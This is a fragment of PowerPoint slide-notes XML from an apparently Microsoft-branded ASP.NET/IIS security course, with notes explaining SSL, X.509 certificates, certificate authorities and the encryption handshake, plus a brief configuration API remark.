              <a:pPr/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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0081AB59-CDD7-4CC4-B625-DB4E3306BB36}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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B29DEA44-9D9B-4E5B-8466-967F4A569995}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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dt" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C12D1309-22CF-466A-8DB9-9131BB22F07A}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>1/31/2010 3:43 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151555" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>©2005 Microsoft Corporation. All rights reserved.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151556" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{55DD4E47-E441-4565-83FD-2C9B8F1559FD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151557" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15155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B3233315-B4FA-40A2-82CF-4AE93E215A01}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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6131DFD6-58F7-468B-83A4-F3FC49492A6C}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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0E72F011-C8EE-434E-B696-C57909C3D97E}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="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CBE9E4C9-A13F-46FE-9B33-2439890905FE}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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91715AF0-7AD6-4CD8-BC08-7C67101DC9CC}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="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BF981AD5-002B-4585-B949-3301F0593364}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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91656A0-5AC7-47F8-82F4-CC2BA81D6D27}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Understanding Secure Sockets Layer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>The SSL technology encrypts communication over HTTP. SSL is supported by a wide range of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>browsers and ensures that an eavesdropper can’t easily decipher information exchanged between a client and a web server. SSL is important for hiding sensitive information such as credit card numbers and confidential company details, but it’s also keenly important for user authentication. For example, if you create a login page where the user submits a user name and password, you must use SSL to encrypt this information. Otherwise, a malicious user could intercept the user credentials and use them to log on to the system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>IIS provides SSL out of the box. Because SSL operates underneath HTTP, using SSL does not</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>change the way you deal with HTTP requests. All the encryption and decryption work is taken care of by the SSL capabilities of the web server software (in this case, IIS). The only difference is that the URL for addresses protected by SSL begins with https:// rather than http://. SSL traffic also flows over a different port (typically web servers use port 443 for SSL requests and port 80 for normal requests).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>For a server to support SSL connections, it must have an installed X.509 certificate (the name X.509 was chosen to correspond with the X.500 directory standard). To implement SSL, you need to purchase a certificate, install it, and configure IIS appropriately. We’ll cover these steps in the following sections.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Understanding Certificates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Before sending sensitive data, a client must decide whether to trust a website. Certificates were designed to serve this purpose, by making it possible to partially verify a user’s identity. Certificates can be installed on any type of computer, but they are most often found on web servers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>With certificates, an organization purchases a certificate from a known certificate authority (CA) and installs it on its web server. The client implicitly trusts the CA and is therefore willing to trust certificate information signed by the CA. This model works well because it is unlikely that a malicious user will go to the expense of purchasing and installing a falsified certificate. The CA also retains information about each registered user. However, a certificate does not in any way ensure the trustworthiness of the server, the safety of the application, or the legitimacy of the business. In</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>these ways, certificates are fundamentally limited in scope.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>The certificate itself contains certain identifying information. It is signed with the CA’s private key to guarantee that it is authentic and has not been modified. The industry-standard certificate type, known as x.509v3, contains the following basic information:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>• The holder’s name, organization, and address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>• The holder’s public key, which will be used to negotiate an SSL session key for encrypting communication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>• The certificate’s validation dates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>• The certificate’s serial number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>In addition, a certificate might also include business-specific information, such as the certificate holder’s industry, the length of time they have been in business, and so on.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>The two biggest CAs are as follows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>• Thawte: http://www.thawte.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>• VeriSign: http://www.verisign.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>If you don’t need the identity validation function of CAs (for example, if your certificates will be used only on a local intranet), you can create and use your own certificates and configure all clients to trust them. This requires Active Directory and Certificate Server (which is a built-in part of Windows 2003 Server and Windows 2000 Server). For more information, consult a dedicated book about Windows network administration.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Understanding SSL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>As described in the previous section, every certificate includes a public key. A public key is part of an asymmetric key pair. The basic idea is that the public key is freely provided to anyone who is interested.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>The corresponding private key is kept carefully locked away and is available only to the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>The interesting twist is that anything that’s encrypted with one of the keys is decipherable with the other. That means a client can retrieve the public key and use it to encode a secret message that can be decrypted only with the corresponding private key. In other words, the client can create a message that only the server can read.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>This process is called asymmetric encryption, and it’s a basic building block of SSL. An important principle of asymmetric encryption is that you can’t determine a private key by analyzing the corresponding public key. To do so would be computationally expensive (even more difficult than cracking one of the encrypted messages). However, asymmetric encryption also has its limitations—namely, it’s much slower and generates much larger messages than symmetric encryption.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Symmetric encryption is the type of encryption that most people are intuitively familiar with.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>It uses the same secret key to encrypt a message as to decrypt it. The drawback with symmetric encryption is that both parties need to know the secret value in order to have a conversation. However, you can’t transmit this information over the Internet, because a malicious user might intercept it and then be able to decipher the following encrypted conversation. The great trick of SSL is to combine asymmetric and symmetric encryption. Asymmetric encryption manages the initial key exchange—in other words, agrees on a secret value. Then, this secret value symmetrically encrypts all subsequent messages, which ensures the best possible performance.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>The whole process works like this, where the client refers to the web browser running on the end user’s machine and the server refers to the web server hosting the websites the user wants to get access to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1. The client sends a request to connect to the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2. The server signs its certificate and sends it to the client. This concludes the handshake portion of the exchange.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3. The client checks whether the certificate was issued by a CA it trusts. If so, it proceeds to the next step. In a web browser scenario, the client may warn the user with an ominoussounding message if it does not recognize the CA, and allows the user to decide whether to proceed. The client recognizes CAs when their certificate is stored in the Trusted Root Certification Authorities store of the operating system. You can find certificates stored in this store through the Internet Explorer options by clicking the Certificates button on the Content tab.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4. The client compares the information in the certificate with the information received from the site (including its domain name and its public key). The client also verifies that the server-side certificate is valid, has not been revoked, and is issued by a trusted CA. Then the client accepts the connection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5. The client tells the server what encryption keys it supports for communication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6. The server chooses the strongest shared key length and informs the client.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7. Using the indicated key length, the client randomly generates a symmetric encryption key.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>This will be used for the duration of the transaction between the server and the client. It ensures optimum performance, because symmetric encryption is much faster than asymmetric encryption.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8. The client encrypts the session key using the server’s public key (from the certificate), and then it sends the encrypted session key to the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9. The server receives the encrypted session key and decrypts it using its private key. Both the client and server now have the shared secret key, and they can use it to encrypt all communication for the duration of the session.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>You’ll notice that the symmetric key is generated randomly and used only for the duration of a session. This limits the security risk. First, it’s harder to break encrypted messages using cryptanalysis, because messages from other sessions can’t be used. Second, even if the key is determined by a malicious user, it will remain valid only for the course of the session.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Another interesting point is that the client must generate the symmetric key. This is because the client has the server’s public key, which can be used to encrypt a message that only the server can read.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>The server does not have corresponding information about the client and thus cannot yet encrypt a message. This also means that if the client supplies a weak key, the entire interaction could be compromised.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>For example, older versions of the Netscape browser used a weak random number generator to create the symmetric key. This would make it much easier for a malicious user to guess the key.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>When deploying an application, you will probably want to purchase certificates from a genuine CA such as VeriSign. This is particularly the case with websites and Internet browsers, which recognize a limited number of CAs automatically. If you use a test certificate to encrypt communication with a secured portion of a website, for example, the client browser will display a warning that the certificate is not from a known CA.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU"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43C8D990-37F4-4714-9E6E-C770A9A6F286}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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42B1B064-207B-4CB5-87FA-215821F34901}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="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78BDF47F-00D1-48F1-9C59-4EDA08EA6331}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5675BD92-9272-4E54-A06D-6978732DC211}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>1/31/2010 3:43 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152579" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>©2005 Microsoft Corporation. All rights reserved.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152580" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{230C33DA-C6AE-4A0F-928F-CFEE2A7A77C7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152581" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15258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C1227990-37C5-4330-BB5B-75A46F55521B}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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5D1484CD-C596-4528-98C1-4595224BF34D}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="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3F0E74C4-34A4-47ED-AA92-0F65EC77C8ED}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="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AE7606A3-A6B3-49B0-AF37-B947ECFE329D}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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6E3EB954-7823-431C-B3EB-D5ECB520C76B}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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C93284E8-8F14-48A2-B4D6-8906ECA8B9E4}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="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9CC593C2-F5A5-4A6B-A925-8C68E8851580}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="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62E2EADA-B0C1-4462-9F03-9B1C69607839}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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CDF0E309-D5A0-4115-85F8-F72330D009E1}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="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834E519D-F964-4830-AC0A-70BE3CA92D85}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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dt" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{73FD1259-B98D-4D3C-AAEA-FDA8C27607FB}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>1/31/2010 3:43 PM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153603" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>©2005 Microsoft Corporation. All rights reserved.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153604" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B76DC47F-E101-4812-B782-AF4334E1EEED}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153605" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153606"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A29AD233-22CD-453B-AAD7-80C7E4E2BABC}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>52</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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E4F25AB3-4A61-4BD0-97B1-456873AADBDF}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>53</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>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FAB87451-ED9E-4708-AE71-2E8B54647D07}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>54</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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Образ слайда 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="203779" name="Заметки 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>To use this configuration API, you need to import the System.Web.Configuration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>namespace into your application. Furthermore, you need to make sure to have a reference</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>to the System.Configuration.dll assembly (which is the case, by default).</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="203780" name="Номер слайда 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7CA2C695-6774-40F0-B89E-C3313844A199}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
